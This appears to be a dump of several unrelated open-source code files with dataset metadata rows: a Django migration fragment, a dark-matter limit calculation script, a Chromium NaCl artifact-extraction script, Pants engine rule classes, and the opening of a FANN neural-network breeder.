'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'img_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_children': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'parties': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'all_members'", 'symmetrical': 'False', 'through': "orm['mks.Membership']", 'to': "orm['mks.Party']"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'place_of_birth': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'place_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year_of_aliyah': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'mks.membership': {
'Meta': {'object_name': 'Membership'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Party']"}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'mks.party': {
'Meta': {'object_name': 'Party'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_members': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'number_of_seats': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'mks.weeklypresence': {
'Meta': {'object_name': 'WeeklyPresence'},
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'hours': ('django.db.models.fields.FloatField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"})
},
'planet.author': {
'Meta': {'object_name': 'Author'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'profile_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'planet.blog': {
'Meta': {'object_name': 'Blog'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200', 'db_index': 'True'})
},
'planet.enclosure': {
'Meta': {'object_name': 'Enclosure'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'length': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '500', 'db_index': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Post']"})
},
'planet.feed': {
'Meta': {'object_name': 'Feed'},
'blog': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Blog']", 'null': 'True', 'blank': 'True'}),
'etag': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'generator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Generator']", 'null': 'True', 'blank': 'True'}),
'guid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'info': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True', 'blank': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'last_checked': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'rights': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200', 'db_index': 'True'})
},
'planet.feedlink': {
'Meta': {'object_name': 'FeedLink'},
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Feed']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '500', 'db_index': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'rel': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'planet.generator': {
'Meta': {'unique_together': "(('name', 'link', 'version'),)", 'object_name': 'Generator'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '5', 'null': 'True', 'blank': 'True'})
},
'planet.post': {
'Meta': {'unique_together': "(('feed', 'guid'),)", 'object_name': 'Post'},
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['planet.Author']", 'through': "orm['planet.PostAuthorData']", 'symmetrical': 'False'}),
'comments_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {}),
'date_created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Feed']"}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'db_index': 'True'})
},
'planet.postauthordata': {
'Meta': {'object_name': 'PostAuthorData'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Author']"}),
'date_created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_contributor': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Post']"})
},
'planet.postlink': {
'Meta': {'object_name': 'PostLink'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '500', 'db_index': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['planet.Post']"}),
'rel': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
'sites.site': {
'Meta': {'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'tagging.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'tagging.taggeditem': {
'Meta': {'unique_together': "(('tag', 'content_type', 'object_id'),)", 'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['tagging.Tag']"})
}
}
complete_apps = ['planet', 'committees', 'laws', 'links', 'mks']
| bsd-3-clause | -8,502,535,806,786,915,000 | 79.522472 | 243 | 0.542106 | false |
pgdeniverville/Hidden-Sector-Limits | Hidden_Sector_Limits.py | 1 | 8466 | #!/usr/bin/env python
from Hidden_Sec_Utilities import *
from Hidden_Sec_Physics import *
import itertools
"""
I use kappa and epsilon interchangeably. They mean the same thing.
Many of these limits are not valid in the off-shell regime, or
change dramatically. Use at your own risk!
"""
#Default value of alpha_p to use
_alpha_p_set = 0.5
#Takes an array of masses mass_arr and generates some experimental limits for kinetically mixed hidden sector dark matter. These limits are written to text files.
#func can be any function that accepts arguments in the form (mv,mx,alpha_p,kappa).
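# For example (illustrative only), a minimal func could be:
#   def eps_func(mv, mx, alpha_p, kappa):
#       return [mv, mx, kappa]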
def table_of_limits(mass_arr,alpha_p=_alpha_p_set,run_name="",fill_val=1000,func=Y_func):
mass_arr = np.array(mass_arr)
#Relic Density, using the fast option.
print("Run Relic_Density.py to generate relic density line")
#relic_tab=[func(mv,mx,alpha_p,gen_relic_dm_fast(mv,mx,alpha_p)) for mv,mx in mass_arr]
#Best limits of muon and electron g-2
print("Generating g-2 epsilon limits")
g_minus_2_tab = [func(mv,mx,alpha_p,min(kappa_muon_lim(mv),kappa_electron_lim(mv))) for mv,mx in mass_arr]
g_minus_2_electron = [func(mv,mx,alpha_p,kappa_electron_lim(mv)) for mv,mx in mass_arr]
g_minus_2_muon = [func(mv,mx,alpha_p,kappa_muon_lim(mv)) for mv,mx in mass_arr]
print("Generating g-2 epsilon favoured region")
g_muon_fav_low_tab = [func(mv,mx,alpha_p,kappa_fav_low(mv)) for mv,mx in mass_arr]
g_muon_fav_high_tab = [func(mv,mx,alpha_p,kappa_fav_high(mv)) for mv,mx in mass_arr]
print("Generating BaBar limits")
babar_tab=[func(mv,mx,alpha_p,babar_func(mv,mx,alpha_p,fill_value=fill_val)) for mv,mx in mass_arr]
print("Generating BaBar 2017 limits")
babar2017_tab=[func(mv,mx,alpha_p,babar_func2017(mv,mx,alpha_p,fill_value=fill_val)) for mv,mx in mass_arr]
print("Generating limits from rare decays (J\Psi->V)")
rare_tab = [func(mv,mx,alpha_p,rarelimit(mv,mx,alpha_p)) for mv,mx in mass_arr]
print("Generating Monojet limits")
monojet_tab = [func(mv,mx,alpha_p,monojet_limit()) for mv,mx in mass_arr]
print("Generating rare kaon decay limits (K->pi+V)")
K_Vpi_tab1=gen_K_Vpi_lim(kpip_invis_dat_1)
K_Vpi_func_1=interp1d(K_Vpi_tab1[:,0],K_Vpi_tab1[:,1],bounds_error=False,fill_value=fill_val)
K_Vpi_tab2=gen_K_Vpi_lim(kpip_invis_dat_2)
K_Vpi_func_2=interp1d(K_Vpi_tab2[:,0],K_Vpi_tab2[:,1],bounds_error=False,fill_value=fill_val)
k_Vpi_tab = [func(mv,mx,alpha_p,min(K_Vpi_func_1(mv),K_Vpi_func_2(mv))) for mv,mx in mass_arr]
print("Generating pion->invisible limits")
invispion_func=interp1d(invispiondat[:,0],invispiondat[:,1],bounds_error=False,fill_value=fill_val)
invispion_tab=[func(mv,mx,alpha_p,invispion_func(mv)) for mv,mx in mass_arr]
#Electroweak/shift in Z mass etc.
print("Generating Electroweak fit limits")
zprime_func=interp1d(zprimedat[:,0],zprimedat[:,1],bounds_error=False,fill_value=fill_val)
zprime_tab = [func(mv,mx,alpha_p,zprime_func(mv)) for mv,mx in mass_arr]
#E137
print("Generating E137 limits")
#e137dat=griddata(E137tab[:,0:2],E137tab[:,2],mass_arr,fill_value=fill_val,method='linear')
e137_vals= np.array([func(mv,mx,alpha_p,(k4alphap/alpha_p)**0.25) for mv,mx,k4alphap in E137tab])
E137_tab = griddata(E137tab[:,0:2],e137_vals,mass_arr,fill_value=fill_val,method='linear')
#MiniBooNE
print("Generating MiniBooNE limits")
miniboone_N_vals= np.array([func(mv,mx,alpha_p,(k4alphap/alpha_p)**0.25) for mv,mx,k4alphap in MiniBooNE_N_tab])
miniboone_n_tab = griddata(MiniBooNE_N_tab[:,0:2],miniboone_N_vals,mass_arr,method='linear')
miniboone_n_tab = [x for x in miniboone_n_tab if not np.isnan(x[2])]
miniboone_e_vals= np.array([func(mv,mx,alpha_p,(k4alphap/alpha_p)**0.25) for mv,mx,k4alphap in MiniBooNE_e_tab])
miniboone_e_tab = griddata(MiniBooNE_e_tab[:,0:2],miniboone_e_vals,mass_arr,method='linear')
miniboone_e_tab = [x for x in miniboone_e_tab if not np.isnan(x[2])]
#LSND
print("Generating LSND limits")
lsnd_vals= np.array([func(mv,mx,alpha_p,(k4alphap/alpha_p)**0.25) for mv,mx,k4alphap in LSNDtab])
LSND_tab = griddata(LSNDtab[:,0:2],lsnd_vals,mass_arr,method='linear')
LSND_tab = [x for x in LSND_tab if not np.isnan(x[2])]
print("Generating limits from Direct Detection")
#direct_det_tab = [func(mv,mx,alpha_p,sigman_to_kappa(Direct_Det(mx),mv,mx,alpha_p)) for mv,mx in mass_arr]
print("Generating limits from Direct Detection - Electron")
direct_det_e_tab = [func(mv,mx,alpha_p,min(sigmae_to_kappa(xenon10efunc(mx),mv,mx,alpha_p),sigmae_to_kappa(xenon100efunc(mx),mv,mx,alpha_p))) for mv,mx in mass_arr]
SCDMSe_tab= [func(mv,mx,alpha_p,sigmae_to_kappa(SCDMSefunc(mx),mv,mx,alpha_p)) for mv,mx in mass_arr]
SENSEIe_tab= [func(mv,mx,alpha_p,sigmae_to_kappa(SENSEIefunc(mx),mv,mx,alpha_p)) for mv,mx in mass_arr]
print("Generating NA64 (2019, https://arxiv.org/abs/1906.00176) limits")
NA64_func=interp1d(NA64dat[:,0],NA64dat[:,1],bounds_error=False,fill_value=fill_val)
NA64_tab=[func(mv,mx,alpha_p,NA64_func(mv)) for mv,mx in mass_arr]
#These are all projections, the year reflects the time when
#the data was recorded, not analyzed!
#NA64_2016_func=interp1d(NA64_2016dat[:,0],NA64_2016dat[:,1],bounds_error=False,fill_value=fill_val)
#NA64_2016_tab=[func(mv,mx,alpha_p,NA64_2016_func(mv)) for mv,mx in mass_arr]
#NA64_2017_func=interp1d(NA64_2017dat[:,0],NA64_2017dat[:,1],bounds_error=False,fill_value=fill_val)
#NA64_2017_tab=[func(mv,mx,alpha_p,NA64_2017_func(mv)) for mv,mx in mass_arr]
#NA64_2018_func=interp1d(NA64_2018dat[:,0],NA64_2018dat[:,1],bounds_error=False,fill_value=fill_val)
#NA64_2018_tab=[func(mv,mx,alpha_p,NA64_2018_func(mv)) for mv,mx in mass_arr]
#np.savetxt(run_name+"relic_density.dat",relic_tab)
np.savetxt(run_name+"precision_g_minus_2.dat",g_minus_2_tab)
np.savetxt(run_name+"precision_g_minus_2_electron.dat",g_minus_2_electron)
np.savetxt(run_name+"precision_g_minus_2_muon.dat",g_minus_2_muon)
np.savetxt(run_name+"precision_g_minus_2_fav_low.dat",g_muon_fav_low_tab)
np.savetxt(run_name+"precision_g_minus_2_fav_high.dat",g_muon_fav_high_tab)
#np.savetxt(run_name+"direct_det.dat",direct_det_tab)
np.savetxt(run_name+"babar.dat",babar_tab)
np.savetxt(run_name+"babar2017.dat",babar2017_tab)
#np.savetxt(run_name+"relic_density.dat",relic_tab)
np.savetxt(run_name+"rare_decay.dat",rare_tab)
np.savetxt(run_name+"monojet.dat",monojet_tab)
np.savetxt(run_name+"kpipinvisk.dat",k_Vpi_tab)
np.savetxt(run_name+"invispion.dat",invispion_tab)
np.savetxt(run_name+"zprime.dat",zprime_tab)
np.savetxt(run_name+"lsndlim.dat",LSND_tab)
np.savetxt(run_name+"miniboone_n_lim.dat",miniboone_n_tab)
np.savetxt(run_name+"miniboone_e_lim.dat",miniboone_e_tab)
np.savetxt(run_name+"e137lim.dat",E137_tab,'%.4f %.4f %.4e')
#np.savetxt(run_name+"e137lim.dat",E137_tab)
#np.savetxt(run_name+"direct_det.dat",direct_det_tab)
np.savetxt(run_name+"direct_det_e.dat",direct_det_e_tab)
np.savetxt(run_name+"sensei_e.dat",SENSEIe_tab)
np.savetxt(run_name+"scdms_e.dat",SCDMSe_tab)
np.savetxt(run_name+"NA64.dat",NA64_tab)
#np.savetxt(run_name+"NA64_2016.dat",NA64_2016_tab)
#np.savetxt(run_name+"NA64_2017.dat",NA64_2017_tab)
#np.savetxt(run_name+"NA64_2018.dat",NA64_2018_tab)
#Make an array of masses!
#marr=[[mv/1000.0,mx/1000.0] for mv in range(10,1000) for mx in range(1,mv/2,1)]
#marr=[[mv/1000.0,mx/1000.0] for mv in range(10,100) for mx in range(1,mv/2,1)]
#marr=[[0.001,0.001/3.0]]+[[3*mx/1000.0,mx/1000.0] for mx in range(1,1000)]+[[3*mx/1000.0,mx/1000.0] for mx in range(1000,3050,50)]
marr=[[3*mx/10000.0,mx/10000.0] for mx in range(1,10)]
marr+=[[3*mx/1000.0,mx/1000.0] for mx in range(1,2000)]
#marr=[[0.001,0.001/5.0]]+[[5*mx/1000.0,mx/1000.0] for mx in range(1,1000)]+[[5*mx/1000.0,mx/1000.0] for mx in range(1000,2000,50)]
make_sure_path_exists("output_2/")
#Masses are quite large, so this will take awhile.
table_of_limits(marr,run_name="output_2/y3_0.5_")
#def sigma_e_func(mv,mx,alpha_p,eps):
# return [mv,mx,sigmae(mv,mx,alpha_p,eps)]
#table_of_limits(marr,func=sigma_e_func,run_name="output/sige3_0.1_")
#mxset=5
#runname="output/mx"+masstext(mxset/1000.0)+"_"
#marr2=[[mv/1000.0,mxset/1000.0] for mv in range(mxset,4000)]
#table_of_limits(marr2,run_name=runname,func=kappa,alpha_p=0.1)
| mit | -1,278,347,884,730,586,000 | 51.583851 | 168 | 0.693244 | false |
heke123/chromium-crosswalk | native_client_sdk/src/build_tools/extract_artifacts.py | 25 | 4283 | #!/usr/bin/env python
# Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import glob
import os
import sys
if sys.version_info < (2, 7, 0):
sys.stderr.write("python 2.7 or later is required run this script\n")
sys.exit(1)
import buildbot_common
import build_paths
from build_paths import NACL_DIR, SDK_SRC_DIR, EXTRACT_ARCHIVE_DIR
sys.path.append(os.path.join(SDK_SRC_DIR, 'tools'))
import getos
import oshelpers
# TODO(binji): The artifacts should be downloaded; until then, point at the
# directory where the artifacts are built.
DOWNLOAD_ARCHIVE_DIR = build_paths.BUILD_ARCHIVE_DIR
PLATFORM = getos.GetPlatform()
GLIBC_X86_TC_DIR = os.path.join('toolchain', '%s_x86_glibc' % PLATFORM)
PNACL_TC_DIR = os.path.join('toolchain', '%s_pnacl' % PLATFORM)
PNACL_TRANSLATOR_DIR = os.path.join(PNACL_TC_DIR, 'translator')
CYGTAR = os.path.join(NACL_DIR, 'build', 'cygtar.py')
TAR = oshelpers.FindExeInPath('tar')
options = None
PPAPI_ARCHIVE = os.path.join(DOWNLOAD_ARCHIVE_DIR,
'%s_ppapi.tar.bz2' % PLATFORM)
GLIBC_ARCHIVE_MAP = [
('glibc', GLIBC_X86_TC_DIR),
('glibc_headers', os.path.join(GLIBC_X86_TC_DIR, 'x86_64-nacl', 'include')),
('glibc_x86_32_libs', os.path.join(GLIBC_X86_TC_DIR, 'x86_64-nacl', 'lib32')),
('glibc_x86_64_libs', os.path.join(GLIBC_X86_TC_DIR, 'x86_64-nacl', 'lib'))]
PNACL_ARCHIVE_MAP = [
('pnacl', PNACL_TC_DIR),
('newlib_headers', os.path.join(PNACL_TC_DIR, 'le32-nacl', 'include')),
('pnacl_libs', os.path.join(PNACL_TC_DIR, 'le32-nacl', 'lib')),
('pnacl_translator_arm_libs',
os.path.join(PNACL_TRANSLATOR_DIR, 'arm', 'lib')),
('pnacl_translator_x86_32_libs',
os.path.join(PNACL_TRANSLATOR_DIR, 'x86-32', 'lib')),
('pnacl_translator_x86_64_libs',
os.path.join(PNACL_TRANSLATOR_DIR, 'x86-64', 'lib'))]
TOOLCHAIN_ARCHIVE_MAPS = {
'glibc': GLIBC_ARCHIVE_MAP,
'pnacl': PNACL_ARCHIVE_MAP,
}
TOOLS_ARCHIVE_MAP = [('tools', 'tools')]
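# Each map entry is (archive_part, destination dir(s) relative to the output root);
# ExtractAll() expands 'archive_part' into '<platform>_<archive_part>.tar.bz2'.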
def Untar(archive, destdir):
if os.path.exists(TAR):
cmd = [TAR]
else:
cmd = [sys.executable, CYGTAR]
if options.verbose:
cmd.extend(['-xvf', archive])
else:
cmd.extend(['-xf', archive])
if not os.path.exists(destdir):
buildbot_common.MakeDir(destdir)
buildbot_common.Run(cmd, cwd=destdir)
def RemoveExt(path):
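# Strips every extension, e.g. 'mac_pnacl.tar.bz2' -> 'mac_pnacl' (illustrative).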
while True:
path, ext = os.path.splitext(path)
if ext == '':
return path
def ExtractArchive(archive_path, destdirs):
Untar(archive_path, EXTRACT_ARCHIVE_DIR)
basename = RemoveExt(os.path.basename(archive_path))
srcdir = os.path.join(EXTRACT_ARCHIVE_DIR, basename)
if type(destdirs) is not list:
destdirs = [destdirs]
for destdir in destdirs:
if not os.path.exists(destdir):
buildbot_common.MakeDir(destdir)
src_files = glob.glob(os.path.join(srcdir, '*'))
for src_file in src_files:
buildbot_common.CopyDir(src_file, destdir)
def ExtractAll(archive_dict, archive_dir, destroot):
for archive_part, rel_destdirs in archive_dict:
archive_name = '%s_%s.tar.bz2' % (PLATFORM, archive_part)
archive_path = os.path.join(archive_dir, archive_name)
if type(rel_destdirs) is not list:
rel_destdirs = [rel_destdirs]
destdirs = [os.path.join(destroot, d) for d in rel_destdirs]
ExtractArchive(archive_path, destdirs)
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-v', '--verbose')
parser.add_argument('-o', '--outdir')
parser.add_argument('-t', '--toolchain', action='append', dest='toolchains',
default=[])
parser.add_argument('--clean', action='store_true')
global options
options = parser.parse_args(args)
if options.clean:
buildbot_common.RemoveDir(options.outdir)
for toolchain in options.toolchains:
ExtractAll(TOOLCHAIN_ARCHIVE_MAPS[toolchain], DOWNLOAD_ARCHIVE_DIR,
options.outdir)
ExtractAll(TOOLS_ARCHIVE_MAP, DOWNLOAD_ARCHIVE_DIR, options.outdir)
Untar(PPAPI_ARCHIVE, EXTRACT_ARCHIVE_DIR)
return 0
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except KeyboardInterrupt:
buildbot_common.ErrorExit('extract_artifacts: interrupted')
| bsd-3-clause | -8,594,949,021,464,773,000 | 29.81295 | 80 | 0.679897 | false |
lahosken/pants | src/python/pants/engine/rules.py | 2 | 5514 | # coding=utf-8
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
from abc import abstractproperty
from collections import OrderedDict
from twitter.common.collections import OrderedSet
from pants.engine.addressable import Exactly
from pants.engine.selectors import type_or_constraint_repr
from pants.util.meta import AbstractClass
from pants.util.objects import datatype
logger = logging.getLogger(__name__)
class Rule(AbstractClass):
"""Rules declare how to produce products for the product graph.
A rule describes what dependencies must be provided to produce a particular product. Rules also act
as factories for constructing the nodes within the graph.
"""
@abstractproperty
def input_selectors(self):
"""Collection of input selectors"""
@abstractproperty
def func(self):
"""Rule function."""
@abstractproperty
def output_product_type(self):
"""The product type produced by this rule."""
def as_triple(self):
"""Constructs an (output, input, func) triple for this rule."""
return (self.output_product_type, self.input_selectors, self.func)
class TaskRule(datatype('TaskRule', ['input_selectors', 'func', 'product_type', 'constraint']),
Rule):
"""A Rule that runs a task function when all of its input selectors are satisfied."""
@property
def output_product_type(self):
return self.product_type
def __str__(self):
return '({}, {!r}, {})'.format(type_or_constraint_repr(self.product_type),
self.input_selectors,
self.func.__name__)
class SingletonRule(datatype('SingletonRule', ['product_type', 'func']), Rule):
"""A default rule for a product, which is thus a singleton for that product."""
@property
def input_selectors(self):
return tuple()
@property
def output_product_type(self):
return self.product_type
def __repr__(self):
return '{}({}, {})'.format(type(self).__name__,
self.product_type.__name__,
self.func.__name__)
class IntrinsicRule(datatype('IntrinsicRule', ['subject_type', 'product_type', 'func']), Rule):
"""A default rule for a pair of subject+product."""
@property
def input_selectors(self):
return tuple()
@property
def output_product_type(self):
return self.product_type
def __repr__(self):
return '{}(({}, {}), {})'.format(type(self).__name__,
self.subject_type.__name__,
self.output_product_type.__name__,
self.func.__name__)
class RuleIndex(datatype('RuleIndex', ['tasks', 'intrinsics', 'singletons'])):
"""Holds an index of tasks and intrinsics used to instantiate Nodes."""
@classmethod
def create(cls, task_entries, intrinsic_entries=None, singleton_entries=None):
"""Creates a NodeBuilder with tasks indexed by their output type."""
intrinsic_entries = intrinsic_entries or tuple()
singleton_entries = singleton_entries or tuple()
# NB make tasks ordered so that gen ordering is deterministic.
serializable_tasks = OrderedDict()
def add_task(product_type, rule):
if product_type not in serializable_tasks:
serializable_tasks[product_type] = OrderedSet()
serializable_tasks[product_type].add(rule)
for entry in task_entries:
if isinstance(entry, Rule):
add_task(entry.output_product_type, entry)
elif isinstance(entry, (tuple, list)) and len(entry) == 3:
output_type, input_selectors, task = entry
if isinstance(output_type, Exactly):
constraint = output_type
elif isinstance(output_type, type):
constraint = Exactly(output_type)
else:
raise TypeError("Unexpected product_type type {}, for rule {}".format(output_type, entry))
factory = TaskRule(tuple(input_selectors), task, output_type, constraint)
# TODO: The heterogeneity here has some confusing implications:
# see https://github.com/pantsbuild/pants/issues/4005
for kind in constraint.types:
# NB Ensure that interior types from SelectDependencies / SelectProjections work by
# indexing on the list of types in the constraint.
add_task(kind, factory)
add_task(constraint, factory)
else:
raise TypeError("Unexpected rule type: {}."
" Rules either extend Rule, or are 3 elem tuples.".format(type(entry)))
intrinsics = dict()
for output_type, input_type, func in intrinsic_entries:
key = (input_type, output_type)
if key in intrinsics:
raise ValueError('intrinsic provided by {} has already been provided by: {}'.format(
func.__name__, intrinsics[key]))
intrinsics[key] = IntrinsicRule(input_type, output_type, func)
singletons = dict()
for output_type, func in singleton_entries:
if output_type in singletons:
raise ValueError('singleton provided by {} has already been provided by: {}'.format(
func.__name__, singletons[output_type]))
singletons[output_type] = SingletonRule(output_type, func)
return cls(serializable_tasks, intrinsics, singletons)
| apache-2.0 | -5,564,196,766,072,002,000 | 35.76 | 100 | 0.653065 | false |
Buggaboo/Triathlon | TriathlonBeta/Triathlon-Breeder.py | 1 | 34773 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
# Howto, Code license, Credits, etc: http://code.google.com/B/BCI-Project-Triathlon/
noGL = False # Set noGL to True for disabling the use of OpenGL (to gain speed, or to avoid python-wx-opengl problems)
import pyfann
from pyfann import libfann
import string
import os
import sys
import random
import copy
import wx
import numpy
from array import array
import WXElements
try:
from wx import glcanvas
haveGLCanvas = True
except ImportError:
haveGLCanvas = False
noGL = True
print "Will start without OpenGL, because wx.glcanvas is not available."
try:
# TODO - refactor this shit to prevent namespace pollution
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
haveOpenGL = True
except ImportError:
haveOpenGL = False
noGL = True
print "Will start without OpenGL, because PyOpenGL is not available."
class AppSettings():
def __init__(self,
datafile,
desired_error = 0.0000000001,
iterations_between_reports = 1000):
self.datafile = datafile
self.desired_error = desired_error
self.iterations_between_reports = iterations_between_reports
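# A FANN .train file begins with a header line: "<num_pairs> <num_inputs> <num_outputs>".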
f = open(datafile+".train", 'r')
firstline = f.readline()
f.close
l = string.split(firstline)
self.num_input = int(l[1])
self.num_output = int(l[2])
self.breeding = False
self.stage = 0
self.netsTried = 0
self.maxMutations = 18
self.populationSize = 12
self.trainingData = libfann.training_data()
self.trainingData.read_train_from_file(datafile+".train")
self.testData = libfann.training_data()
self.testData.read_train_from_file(datafile+".test")
